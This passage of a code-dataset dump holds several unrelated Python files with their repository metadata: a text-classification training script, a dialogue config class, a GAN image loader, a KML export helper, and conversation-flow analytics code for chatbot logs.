DPCNN, Transformer, bert, ERNIE, albert')\n parser.add_argument(\"--model_name_or_path\", default=None, type=str, required=True,\n help=\"Path to pre-trained model or shortcut name selected in the list\")\n parser.add_argument(\"--task_name\", default='THUCNews', type=str, required=True,\n help=\"The name of the task to train selected in the list: \" + \", \".join(processors.keys()))\n parser.add_argument(\"--output_dir\", default=None, type=str, required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n parser.add_argument('--embedding_type', default='random', type=str,\n help='random or pre_trained')\n parser.add_argument('--use_word', action='store_true',\n help='True for word, False for char')\n\n parser.add_argument(\"--max_seq_length\", default=512, type=int,\n help=\"The maximum total input sequence length after tokenization. 
Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\")\n parser.add_argument(\"--do_train\", action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\", action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_predict\", action='store_true',\n help=\"Whether to run the model in inference mode on the test set.\")\n parser.add_argument(\"--do_lower_case\", action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\n\n parser.add_argument(\"--per_gpu_train_batch_size\", default=8, type=int,\n help=\"Batch size per GPU/CPU for training.\")\n parser.add_argument(\"--per_gpu_eval_batch_size\", default=8, type=int,\n help=\"Batch size per GPU/CPU for evaluation.\")\n parser.add_argument(\"--learning_rate\", default=5e-5, type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float,\n help=\"Weight deay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-6, type=float,\n help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float,\n help=\"Max gradient norm.\")\n parser.add_argument(\"--num_train_epochs\", default=3.0, type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\", default=0.1, type=float,\n help=\"Proportion of training to perform linear learning rate warmup for,E.g., 0.1 = 10% of training.\")\n\n parser.add_argument('--logging_steps', type=int, default=None,\n help=\"Log every X updates steps.\")\n parser.add_argument('--save_steps', type=int, default=None,\n help=\"Save checkpoint every X updates steps.\")\n parser.add_argument(\"--eval_checkpoints\", type=int, default=None,\n help=\"Evaluate specific checkpoints\")\n parser.add_argument(\"--eval_all_checkpoints\", action='store_true',\n help=\"Evaluate all checkpoints starting with the same 
prefix as model_name ending and ending with step number\")\n parser.add_argument('--overwrite_output_dir', action='store_true',\n help=\"Overwrite the content of the output directory\")\n parser.add_argument('--seed', type=int, default=42,\n help=\"random seed for initialization\")\n args = parser.parse_args()\n return args\n\n\ndef get_model_type(model_type):\n model_type = model_type.lower()\n if 'bert' in model_type or 'ernie' == model_type:\n return 'bert'\n if 'transformer' in model_type:\n return 'transformer'\n else:\n return 'else'\n\n\nif __name__ == '__main__':\n args = get_args()\n args.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n args.output_dir = os.path.join(args.output_dir, '{}'.format(args.model_type))\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n init_logger(log_file=os.path.join(args.output_dir, '{}-{}.log'.format(args.model_type, args.task_name)))\n if os.path.exists(args.output_dir) and os.listdir(\n args.output_dir) and args.do_train and not args.overwrite_output_dir:\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.\".format(\n args.output_dir))\n\n # Prepare GLUE task\n # args.task_name = args.task_name.lower()\n if args.task_name not in processors:\n raise ValueError(\"Task not found: %s\" % (args.task_name))\n args.processor = processors[args.task_name]()\n args.output_mode = output_modes[args.task_name]\n\n module = import_module('models.' 
+ args.model_type)\n config = module.Config(args, finetuning_task=args.task_name)\n args.class_list = config.class_list\n\n if get_model_type(args.model_type) == 'bert':\n from train_eval_bert import load_and_cache_examples, train, evaluate\n else:\n from train_eval import load_and_cache_examples, train, evaluate\n if args.model_type == 'FastText':\n args.n_gram_vocab = config.n_gram_vocab\n\n # Training\n if args.do_train:\n if get_model_type(args.model_type) == 'bert':\n train_dataset = load_and_cache_examples(args, args.task_name, config.tokenizer, data_type='train')\n if train_dataset[0][5] is not None:\n config.n_num_feat = len(train_dataset[0][5])\n else:\n config.n_vocab, train_dataset = load_and_cache_examples(args, args.task_name, config.tokenizer, data_type='train')\n if train_dataset[0][5] is not None:\n config.n_num_feat = len(train_dataset[0][5])\n\n # model = module.Model(config).from_pretrained(args.model_name_or_path, config=config).to(args.device)\n model = module.Model.from_pretrained(args.model_name_or_path, config=config).to(args.device)\n global_step, tr_loss, best_steps = train(args, train_dataset, model, config.tokenizer)\n logger.info(\" global_step = %s, average loss = %s, best_step = %s\", global_step, tr_loss, best_steps)\n\n # Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()\n logger.info(\"Saving model checkpoint to %s\", args.output_dir)\n # Save a trained model, configuration and tokenizer using `save_pretrained()`.\n # They can then be reloaded using `from_pretrained()`\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(args.output_dir)\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(args.output_dir, 'training_args.bin'))\n\n # Evaluation\n results = []\n if args.do_eval or args.do_predict:\n if args.eval_checkpoints is not None:\n checkpoints = 
[(args.eval_checkpoints, os.path.join(args.output_dir, 'checkpoint-{}'.format(args.eval_checkpoints)))]\n elif args.eval_all_checkpoints:\n checkpoints = list(\n os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + '/**/' + WEIGHTS_NAME, recursive=True)))\n checkpoints = [(int(checkpoint.split('-')[-1]), checkpoint)\n for checkpoint in checkpoints if checkpoint.find('checkpoint') != -1]\n checkpoints = sorted(checkpoints, key=lambda x: x[0])\n else:\n checkpoints = [(0, args.output_dir)]\n logger.info(\"Evaluate the following checkpoints: %s\", checkpoints)\n for _, checkpoint in checkpoints:\n global_step = checkpoint.split('/')[-1].split('-')[-1] if len(checkpoints) > 0 else \"\"\n prefix = checkpoint.split('/')[-1] if checkpoint.find('checkpoint') != -1 else \"\"\n\n # model = module.Model(config).from_pretrained(checkpoint)\n model = module.Model.from_pretrained(checkpoint)\n model.to(args.device)\n result = evaluate(args, model, config.tokenizer, global_step, prefix=prefix, data_type='dev' if args.do_eval else 'test')\n results.extend([(k + '_{}'.format(global_step), v) for k, v in result.items()])\n output_eval_file = os.path.join(args.output_dir, \"checkpoint_eval_results_{}.txt\".format('dev' if args.do_eval else 'test'))\n with open(output_eval_file, \"w\") as writer:\n for key, value in results:\n writer.write(\"%s = %s\\n\" % (key, str(value)))\n","repo_name":"VincentWong1/nlpLab","sub_path":"toolkits/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12747221804","text":"import json\n\n\nclass DialogConfig:\n def __init__(self, config_file_path=None):\n if config_file_path:\n with open(config_file_path, 'r') as f:\n config_json = json.load(f)\n else:\n config_json = None\n\n self.max_round_num = config_json['max_round_num'] if config_json else 0\n self.agent_request_slots = config_json['agent_request_slots'] if 
config_json else []\n self.agent_inform_slots = config_json['agent_inform_slots'] if config_json else []\n self.default_start_slot = config_json['default_start_slot'] if config_json else []\n self.no_query_slots = config_json['no_query_slots'] if config_json else []\n self.all_intents = config_json['all_intents'] if config_json else []\n self.agent_rule_requests = config_json['agent_rule_requests'] if config_json else []\n self.slot_name_translations = config_json['slot_name_translations'] if config_json else {}\n\n self.all_slots = sorted(list(set(self.agent_inform_slots + self.agent_request_slots)))\n\n # Possible actions for the agent\n self.feasible_agent_actions = [\n {'intent': 'done', 'inform_slots': {}, 'request_slots': []}, # Triggers closing of conversation\n {'intent': 'match_found', 'inform_slots': {}, 'request_slots': []} # Signals a found match for a ticket\n ]\n\n # Add inform slots\n for slot in self.agent_inform_slots:\n if slot != 'ticket':\n self.feasible_agent_actions.append({'intent': 'inform',\n 'inform_slots': {slot: \"PLACEHOLDER\"},\n 'request_slots': []})\n\n # Add request slots\n for slot in self.agent_request_slots:\n self.feasible_agent_actions.append({'intent': 'request',\n 'inform_slots': {},\n 'request_slots': [slot]})\n\n\ndef init_config(config_file_path):\n global config\n config = DialogConfig(config_file_path)\n\n\nconfig = DialogConfig()\n","repo_name":"alexander-zap/dialogue-agent","sub_path":"dialogue_agent/dialog_config.py","file_name":"dialog_config.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36750931083","text":"# Want to load:\n# - Target image\n# - Source image embedding\n# = Target image embedding\n\nimport numpy as np\nimport pandas as pd\n\nimport torch\nimport torch.utils.data as data\nimport torchvision\nimport os\nfrom PIL import Image\n\nimport torchvision.datasets as dset\nimport torchvision.transforms 
as transforms\nimport torchvision.utils as vutils\nfrom torchvision.datasets import ImageFolder\n\n# IMAGE_PATH = \"\"\n# transform = None\n# dataset = ImageFolder(IMAGE_PATH, transform)\n\nclass GAN_Dataset(data.Dataset):\n\n def __init__(self, dir, transform):\n super(GAN_Dataset, self).__init__()\n self.dir = dir\n self.transform = transform\n self.total_imgs = os.listdir(dir)\n\n self.img_paths = []\n img_path = self.dir + \"/\"\n img_list = os.listdir(dir)\n img_nums = len(img_list)\n for i in range(img_nums):\n img_name = img_path + img_list[i]\n self.img_paths.append(img_name)\n\n def __len__(self):\n return len(self.total_imgs)\n\n def __getitem__(self, idx):\n img_loc = os.path.join(self.dir, self.total_imgs[idx])\n image = Image.open(img_loc).convert('RGB')\n tensor_image = self.transform(image)\n\n name = self.img_paths[idx]\n print(name)\n return tensor_image\n\nclass ConcatDataset(torch.utils.data.Dataset):\n def __init__(self, *datasets):\n self.datasets = datasets\n\n def __getitem__(self, i):\n return tuple(d[i] for d in self.datasets)\n\n def __len__(self):\n return min(len(d) for d in self.datasets)\n\ndef dataloader(root_source = \"\\clean_dataset\\train_data\",\n root_target = \"\\clean_dataset\\train_data\",\n image_size = 224,\n num_channels = 3,\n batch_size = 4,\n num_workers = 6,\n shuffle = True):\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n# transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n transforms.Resize((image_size,image_size)),\n# transforms.RandomRotation(45),\n ])\n\n # image_data = GAN_Dataset(dir = root, transform = transform)\n # dataset = data.TensorDataset(image_data, image_data)\n # dataloader = data.DataLoader(image_data,\n # batch_size=batch_size,\n # shuffle=True,\n # num_workers=num_workers)\n \n # return zip(dataloader, dataloader)\n\n dataloader = data.DataLoader(\n ConcatDataset(\n GAN_Dataset(dir = root_source, transform = transform), \n GAN_Dataset(dir = root_target, transform = transform)\n 
), batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n\n return dataloader\n","repo_name":"ece324-2020/MirrorMe","sub_path":"GAN_DataLoader2.py","file_name":"GAN_DataLoader2.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9867692306","text":"import simplekml\nimport random\n\ncolor = simplekml.Color.chocolate\nalt_mode = simplekml.AltitudeMode.absolute\n\n\ndef make_random_color():\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n c = simplekml.Color.rgb(r, g, b, 100)\n return c\n\n\ndef tuple2kml(kml, name, tracks, color):\n ls = kml.newlinestring(name=name)\n ls.coords = [(wpt[0], wpt[1], wpt[2]) for wpt in tracks]\n ls.extrude = 1\n ls.altitudemode = alt_mode\n ls.style.linestyle.width = 1\n ls.style.polystyle.color = color\n ls.style.linestyle.color = color\n\n\ndef place_mark(point, kml, name='test', hdg=None):\n pnt = kml.newpoint(name=name, coords=[point], altitudemode=alt_mode)\n pnt.style.labelstyle.scale = 0.25\n pnt.style.iconstyle.icon.href = '.\\\\placemark.png'\n # pnt.style.iconstyle.icon.href = '.\\\\plane.png'\n if hdg is not None:\n pnt.style.iconstyle.heading = (hdg + 270) % 360\n\n\ndef save_to_kml(tracks, save_path='agent_set'):\n kml = simplekml.Kml()\n\n for key, t in tracks.items():\n color = make_random_color()\n tuple2kml(kml, key, t, color)\n\n print(\"Save to \"+save_path+\".kml successfully!\")\n kml.save(save_path+'.kml')\n","repo_name":"Lydia-Yahuhe/cdr_mcts","sub_path":"fltsim/visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1636222434","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\nimport json\nimport conversation_analytics_toolkit as cat\n#from pandas.io.json import json_normalize\nfrom pandas 
import json_normalize\n\nclass _conversationPathAnalysis:\n def __init__(self, mode, on_column, max_depth, trim_reroutes, silent_mode=False):\n self.mode = mode\n self.on_column = on_column\n self.max_depth = max_depth\n self.trim_reroutes = trim_reroutes\n self.nodes_paths = defaultdict(list)\n self.warning_message = \"\"\n self.silent_mode = silent_mode\n\n def handle_node_row(self, path, row, step, is_conversation_start, path_length):\n if not path in self.nodes_paths:\n self.nodes_paths[path] = {\"flows\":0, \"rerouted\":0, \"dropped_off\":0, \"type\": \"NODE\", \"name\": row[self.on_column],\"is_conversation_start\": is_conversation_start, \"conversation_log_ids_dropped_off\":[], \"conversation_log_ids_rerouted\":[],\"path_length\": path_length}\n self.nodes_paths[path][\"flows\"] += 1\n #if (row.response_branch_exited==True and row.response_branch_exited_reason=='fallback' and row.digression is not True):\n if self.trim_reroutes == True:\n if (row.branch_exited==True and row.branch_exited_reason=='fallback' and row.digression is False):\n self.nodes_paths[path][\"rerouted\"] += 1\n self.nodes_paths[path][\"conversation_log_ids_rerouted\"].append((row.conversation_id, row.log_id))\n return 'rerouted'\n\n def handle_conversation_node_exit(self, path, step, row):\n self.nodes_paths[path][\"dropped_off\"] += 1\n self.nodes_paths[path][\"conversation_log_ids_dropped_off\"].append((row.conversation_id, row.log_id))\n\n def handle_conversation_path(self, df):\n # if data doesn't include digression, add it for downstream dependency.\n if 'digression' not in df.columns:\n df[\"digression\"] = False\n\n prev_node_path = \"\"\n prev_row = \"\"\n delimiter = \"\\\\\"\n for i, (index, row) in enumerate(df.iterrows()):\n node_code = row[self.on_column]\n node_id = str(node_code)\n if i==0:\n curr_node_path = node_id\n path_length = 0\n if self.handle_node_row(curr_node_path, row, i, True, path_length) == 'rerouted':\n # note this will never happen if trim_reroutes=False\n 
break\n else:\n curr_node_path = prev_node_path + delimiter + node_id\n path_length += 1\n if (i <= self.max_depth):\n if self.handle_node_row(curr_node_path, row, i, True, path_length) == 'rerouted':\n # note this will never happen if trim_reroutes=False\n break\n else:\n self.warning_message = \"reached depth limit of \" + str(i-1) + \", ignoring steps beyond. You can set max_depth to a larger number\"\n #print(\"reached depth limit of \" + str(i-1) + \", ignoring steps beyond. You can set max_depth to a larger number\")\n self.handle_conversation_node_exit(prev_node_path, i-1, row)\n break\n prev_node_path = curr_node_path\n prev_row = row\n if i == len(df) - 1:\n self.handle_conversation_node_exit(curr_node_path, i, row)\n\nclass DialogNodesGraph(): \n # compute visits in dialog nodes\n def __init__(self, workspace, description=\"\", silent_mode=False):\n self.steps = None\n df_workspace = json_normalize(workspace)\n # dataframe representation of the workspace\n self.dialog_nodes = df_workspace['dialog_nodes'].values[0]\n # compute map from node to its index in the dialog_nodes_array\n self.dialog_node_index = {}\n for i, element in enumerate(self.dialog_nodes):\n node_id = element[\"dialog_node\"]\n self.dialog_node_index[node_id] = i\n self.description = \"\"\n # count visits of nodes_visited in each node, prev, and next\n self.nodes_visited_graph = {}\n # map of conversations and their steps\n self.conversation_steps = {}\n self.silent_mode = silent_mode\n\n def _get_node(self, node_id):\n return self.dialog_nodes[self.dialog_node_index[node_id]]\n\n def _add_conversation_visits_to_graph(self, nodes_visited):\n for i, node in enumerate(nodes_visited):\n graph = self.nodes_visited_graph\n # add node if not exist\n if node not in graph:\n graph[node] = {'visits': 0, 'prev': {}, 'next': {}}\n # add count to current node\n graph[node]['visits'] += 1\n # add next to every node except last\n if i < len(nodes_visited) - 1:\n next_node = nodes_visited[i+1]\n if 
next_node not in graph[node]['next']:\n graph[node]['next'][next_node] = {'visits': 0}\n graph[node]['next'][next_node]['visits']+=1\n # add prev to every node except first\n if i > 0:\n prev_node = nodes_visited[i-1]\n if prev_node not in graph[node]['prev']:\n graph[node]['prev'][prev_node] = {'visits': 0}\n graph[node]['prev'][prev_node]['visits']+=1\n \n def _slider_update(self, slider, step, step_desc, step_message = None):\n if self.silent_mode == True:\n return\n width = 90\n prefix = \"\"\n long_message = prefix + step_desc + '.' * (width - len(step_desc) - len(prefix))\n slider.update(step)\n if step_message is not None:\n slider.write(step_message)\n slider.set_description(long_message)\n\n def compute_visits(self, logs):\n if not type(self.steps) == pd.core.frame.DataFrame:\n self.steps = logs\n else:\n self.steps = self.steps.append(logs)\n conversations_grouped = logs.groupby(\"conversation_id\")\n from tqdm import tqdm, tqdm_notebook\n if self.silent_mode == False:\n if cat.use_widgets():\n slider = tqdm_notebook(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n else:\n slider = tqdm(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=90)\n i=0\n for conversation, steps_df in conversations_grouped:\n i +=1\n if i/100 == int(i/100): # every 100 conversations update the slider\n step = int(100/len(conversations_grouped)*100)\n self._slider_update(slider, step, \"Processed {} of {} conversations\".format(i, len(conversations_grouped)))\n nodes_visited_in_conversation = []\n steps_df = steps_df.sort_values([\"response_timestamp\"])\n for index, row in steps_df.iterrows():\n nodes_visited_in_conversation.extend(row[\"nodes_visited\"]) \n self.conversation_steps[conversation] = nodes_visited_in_conversation\n self._add_conversation_visits_to_graph(nodes_visited_in_conversation)\n self._slider_update(slider, 100, \"Processed {} conversations\".format(i))\n\n def 
get_conversation_steps(self, conversation_id):\n return self.conversation_steps[conversation_id]\n\n def was_node_visited(self, node_id):\n return True if node_id in self.nodes_visited_graph else False\n\n def get_nodes_visited(self, node_id):\n return self.nodes_visited_graph[node_id]\n\n def get_node(self, node_id):\n return self._get_node(node_id)\n\n def get_node_label(self, node, show_type = True, show_id_if_title_exist = True, show_visits = True):\n node_type = node[\"type\"] if show_type == True else \"\"\n node_title = node[\"title\"] if \"title\" in node else \"\"\n node_id = node[\"dialog_node\"]\n if self.was_node_visited(node_id):\n node_visits = self.get_nodes_visited(node_id)[\"visits\"]\n else: \n node_visits = 0\n node_label = \"\"\n if show_type:\n node_label = \"[{}]\".format(node_type)\n if not show_id_if_title_exist and node_title != \"\":\n node_label = node_label + \" \" + node_title\n else: \n node_label = node_label + \" \" + node_title + \" : \" + node_id\n if show_visits == True:\n node_label = node_label + \" [ {} ]\".format(node_visits)\n return node_label\n\n def info(self):\n return {\n 'converstions': len(self.conversation_steps.keys()),\n 'steps': len(self.steps),\n 'nodes': len(self.nodes_visited_graph.keys())\n }\n\n def flows_to_from_node_sankey(self, node_id, arrangement=\"freeform\", orientation='h', pad=10, hovermode='x'):\n import plotly.graph_objects as go \n current_node_index = self.dialog_node_index[node_id]\n nodes_label = [self.get_node_label(n) for n in self.dialog_nodes]\n sankey_nodes = { \"label\": nodes_label, \"pad\": 10}\n #get links for the given node from the graph\n node_graph = self.get_nodes_visited(node_id)\n sankey_links = {\"source\": [], \"target\": [], \"value\": []}\n #iterate on prev\n for prev_node, prev_value in node_graph[\"prev\"].items():\n sankey_links[\"source\"].append(self.dialog_node_index[prev_node])\n sankey_links[\"target\"].append(current_node_index)\n 
sankey_links[\"value\"].append(prev_value[\"visits\"])\n for next_node, next_value in node_graph[\"next\"].items():\n sankey_links[\"source\"].append(current_node_index)\n sankey_links[\"target\"].append(self.dialog_node_index[next_node])\n sankey_links[\"value\"].append(next_value[\"visits\"])\n \n fig = go.Figure(go.Sankey(\n valuesuffix = \" visits\",\n orientation = orientation,\n arrangement = arrangement,\n node = {\n \"label\": sankey_nodes[\"label\"],\n 'pad':pad},\n link = {\n \"source\": sankey_links[\"source\"],\n\n \"target\": sankey_links[\"target\"],\n \"value\": sankey_links[\"value\"]}))\n fig.update_layout(title_text=\"Nodes visited for node: \" + node_id , font_size=10, hovermode = hovermode)\n fig.show()\n return \n\n def flows_to_from_node_html(self, node_id):\n node_graph = self.get_nodes_visited(node_id)\n prev_list = []\n for prev_node, prev_value in node_graph[\"prev\"].items():\n prev_list.append({\"prev_node\": prev_node, \"type\": self.get_node(node_id)[\"type\"], \"visits\": prev_value[\"visits\"]})\n prev_df = pd.DataFrame(prev_list)\n next_list = []\n for next_node, next_value in node_graph[\"next\"].items():\n next_list.append({\"next_node\": next_node, \"type\": self.get_node(node_id)[\"type\"], \"visits\": next_value[\"visits\"]})\n next_df = pd.DataFrame(next_list)\n from IPython.display import display, HTML\n display(HTML(prev_df.to_html()))\n display(HTML(next_df.to_html()))\n\nclass MilestoneFlowGraph: \n # data structures\n # { milestones: m1 --> {}}\n # { funnels: funnels --> [m1, m2]} \n # { mappings: node --> milestone}\n # compute visits in dialog nodes\n def __init__(self, workspace, silent_mode=False):\n #map of milestones\n self.milestones = {}\n #map of funnels, initialized default\n self.funnels = {\n \"default\": []\n }\n #nodes mapping to milestones\n self.nodes = {}\n df_workspace = json_normalize(workspace)\n self.dialog_nodes = df_workspace['dialog_nodes'].values[0]\n # compute map from node to its index in the 
dialog_nodes_array\n self.dialog_node_index = {}\n for i, element in enumerate(self.dialog_nodes):\n node_id = element[\"dialog_node\"]\n self.dialog_node_index[node_id] = i\n self.silent_mode = silent_mode\n\n def add_milestones(self, names, funnel=\"default\", atIndex=None):\n # add milestone, warn if already exists\n if atIndex==None:\n atIndex = len(self.funnels[funnel])\n for name in names:\n self.add_milestone(name, funnel, atIndex) \n atIndex+=1\n return\n\n def add_milestone(self, name, funnel=\"default\", atIndex=None):\n # add milestone, if not exist already\n if name in self.milestones:\n return\n #print(\"warning: milestone '{}' is already defined\".format(name))\n if atIndex==None:\n atIndex = len(self.funnels[funnel])\n self.funnels[funnel].insert(atIndex, name)\n self.milestones[name] = name\n return\n\n def add_node_to_milestone(self, dialog_node_id, milestone):\n # validate that node exists and milestone exists, warn if previous mapping exists\n if not dialog_node_id in self.dialog_node_index:\n print(\"Warning: dialog node '{}' does not exist in workspace\".format(dialog_node_id))\n if not milestone in self.milestones:\n print(\"Error: milestone is not defined. 
Use add_milestone() to add milestones\")\n return\n if dialog_node_id in self.nodes:\n print(\"Warning: dialog node '{}' is already defined for milestone '{}', overriding...\".format(dialog_node_id,self.nodes[dialog_node_id]))\n self.nodes[dialog_node_id] = milestone \n\n def get_funnel(self, funnel=\"default\"):\n if funnel not in self.funnels.keys():\n print(\"Error: funnel '{}' is not defined.\".format(funnel))\n return\n return self.funnels[funnel]\n\n def get_milestone_in_nodes_visited(self, nodes):\n result = None\n for node in nodes:\n if node in self.nodes.keys():\n result = self.nodes[node]\n break\n return result \n\n def enrich_milestones(self, df_logs):\n # take original data, for every nodes_visited, check if one has milestone def, enrich milestone\n # add column: milestone, funnels, \n df_logs['milestone'] = None\n slider = None\n conversations_grouped = df_logs.groupby(\"conversation_id\")\n \n from tqdm import tqdm, tqdm_notebook\n if self.silent_mode == False:\n if cat.use_widgets():\n slider = tqdm_notebook(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n else:\n slider = tqdm(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n i=0\n #for each conversation \n for conversation, steps_df in conversations_grouped:\n i +=1\n if i/100 == int(i/100): # every 100 conversations update the slider\n step = int(100/len(conversations_grouped)*100)\n self._slider_update(slider, step, \"Processed {} of {} conversations\".format(i, len(conversations_grouped))) \n #nodes_visited_in_conversation = []\n steps_df= steps_df.sort_values([\"response_timestamp\"])\n last_index = None\n #for each conversation step, update the milestone in the original data\n for index, row in steps_df.iterrows():\n last_index = index\n nodes_visited = row[\"nodes_visited\"]\n milestone = self.get_milestone_in_nodes_visited(nodes_visited)\n if milestone != None:\n df_logs.at[index, 
\"milestone\"] = milestone \n # if last step is not a milestone, add the Other node\n if df_logs.loc[last_index]['milestone'] == None:\n df_logs.at[index, \"milestone\"] = 'Other'\n #df_logs.loc[last_index]['milestone'] = 'Other'\n self._slider_update(slider, 100, \"Processed {} conversations\".format(i))\n \n def _slider_update(self, slider, step, step_desc, step_message = None):\n if self.silent_mode == True:\n return\n width = 90\n prefix = \"\"\n long_message = prefix + step_desc + '.' * (width - len(step_desc) - len(prefix))\n slider.update(step)\n if step_message is not None:\n slider.write(step_message)\n slider.set_description(long_message)\n \n\ndef compute_flows(df, config):\n \"\"\"\n DEPRECATED: compute aggregated flows across nodes and corresponding statistics, such as number of dropoffs\n returns results as a df for visualization\n \"\"\"\n print(\"Error. compute_flows is deprecated. Use aggregate_flows instead\")\n return\n # check optional config attributes\n if \"max_path_limit\" not in config:\n print (\"Warning, max_path_limit is missing from config. 
Default 20 is assumed\")\n config[\"max_path_limit\"] = 20\n\n # check mandatory dataframe fields\n # TODO: check additional mandatory fields , eg log_id\n mandatory_columns = ['conversation_id', 'node_visited', 'response_timestamp']\n for column in mandatory_columns:\n if column not in df.columns.values:\n raise Exception(\"input data is missing mandatory column: \" + column)\n\n analysis = _conversationPathAnalysis(config)\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\")\n analysis.handle_conversation_path(conversation_df)\n \n if len(analysis.warning_message) > 0:\n print(analysis.warning_message)\n df_node_out = pd.DataFrame.from_dict(analysis.nodes_paths, orient=\"index\")\n df_node_out.reset_index(inplace=True)\n df_node_out.rename(columns={'index':'path'}, inplace=True)\n\n return pd.concat([df_node_out])[['path','name','type','is_conversation_start','flows','rerouted','dropped_off','conversation_log_ids_rerouted','conversation_log_ids_dropped_off','path_length']]\n\ndef aggregate_flows(df, max_depth=30, mode=\"turn-based\", on_column=\"turn_label\", trim_reroutes=False, reverse=False, silent_mode=False):\n \"\"\"\n compute aggregated flows across nodes and corresponding statistics, such as number of dropoffs\n returns results as a df for visualization\n \"\"\"\n if mode not in [\"turn-based\", \"milestone-based\"]:\n print(\"invalid mode: {}. 
Valid values are either turn-based or milestone-based\".format(mode))\n return\n if on_column not in df.columns:\n print(\"invalid column name: {} does not exist in dataframe\".format(column))\n return\n\n # check mandatory dataframe fields\n # TODO: check additional mandatory fields , eg log_id\n mandatory_columns = ['log_id', 'conversation_id', 'response_timestamp']\n for column in mandatory_columns:\n if column not in df.columns.values:\n raise Exception(\"input data is missing mandatory column: \" + column)\n\n analysis = _conversationPathAnalysis(mode, on_column, max_depth, trim_reroutes, silent_mode)\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\", ascending=not reverse)\n analysis.handle_conversation_path(conversation_df)\n if len(analysis.warning_message) > 0:\n print(analysis.warning_message)\n df_node_out = pd.DataFrame.from_dict(analysis.nodes_paths, orient=\"index\")\n df_node_out.reset_index(inplace=True)\n df_node_out.rename(columns={'index':'path'}, inplace=True)\n\n return pd.concat([df_node_out])[['path','name','type','is_conversation_start','flows','rerouted','dropped_off','conversation_log_ids_rerouted','conversation_log_ids_dropped_off','path_length']]\n \n# def _find_consecutive_flow_states(df, column=\"milestone\"):\n# log_ids_to_delete = []\n# for idx, conversation_df in df.groupby(df['conversation_id']):\n# conversation_df = conversation_df.sort_values(\"response_timestamp\")\n# #for each conversation, remove duplicate milestones\n# last_milestone = None\n# for index, row in conversation_df.iterrows():\n# if row[column] != last_milestone:\n# last_milestone = row[column]\n# else:\n# log_ids_to_delete.append(row['log_id'])\n# return log_ids_to_delete\n\n\ndef merge_compare_flows(curr, last):\n def update_curr_rows(df, mask):\n #all fields in current exists, only update the previous\n df.loc[mask,'flows_prev'] = 0\n df.loc[mask,'rerouted_prev'] = 0\n 
df.loc[mask,'dropped_off_prev'] = 0 \n df.loc[mask,'flow_in_curr_only'] = True\n \n def update_prev_rows(df, mask):\n #copy fields from prev, set current flows to zeros \n df.loc[mask,'name'] = df[mask]['name_prev']\n df.loc[mask,'type'] = df[mask]['type_prev']\n df.loc[mask,'is_conversation_start'] = df[mask]['is_conversation_start_prev']\n df.loc[mask,'flows'] = 0\n df.loc[mask,'rerouted'] = 0\n df.loc[mask,'dropped_off'] = 0\n df['empty_arr'] = [[]] * len(df)\n df.loc[mask,'conversation_log_ids_rerouted'] = df[mask]['empty_arr']\n df.loc[mask,'conversation_log_ids_dropped_off'] = df[mask]['empty_arr']\n df.drop('empty_arr', axis='columns', inplace=True)\n df.loc[mask,'path_length'] = df[mask]['path_length_prev']\n df.loc[mask,'flow_in_prev_only'] = True\n \n #outer (union) join which merges on the path column\n merged = pd.DataFrame.merge(curr, last,\n on=['path'],\n how='outer', suffixes=('','_prev'))\n \n merged[\"flow_in_prev_only\"] = False\n merged[\"flow_in_curr_only\"] = False\n curr_rows_only_mask = (merged[\"name\"].notna() & merged[\"name_prev\"].isna())\n prev_rows_only_mask = (merged[\"name\"].isna() & merged[\"name_prev\"].notna())\n both_mask = (merged[\"name\"].notna() & merged[\"name_prev\"].notna())\n \n # handle each case\n update_curr_rows(merged, curr_rows_only_mask)\n update_prev_rows(merged, prev_rows_only_mask)\n \n # select the right fields to return\n columns = ['path', 'name', 'type', 'is_conversation_start', 'flows', 'rerouted',\n 'dropped_off', 'flows_prev', 'rerouted_prev',\n 'dropped_off_prev', 'conversation_log_ids_rerouted',\n 'conversation_log_ids_dropped_off', 'path_length', 'flow_in_curr_only', 'flow_in_prev_only']\n # reset the index\n merged.reset_index()\n print(\"Merging flows:\\nNew flows only in current period:(\",curr_rows_only_mask.sum(),\\\n \")\\nFlows in both periods:(\", both_mask.sum(),\\\n \")\\nOld flows not in current 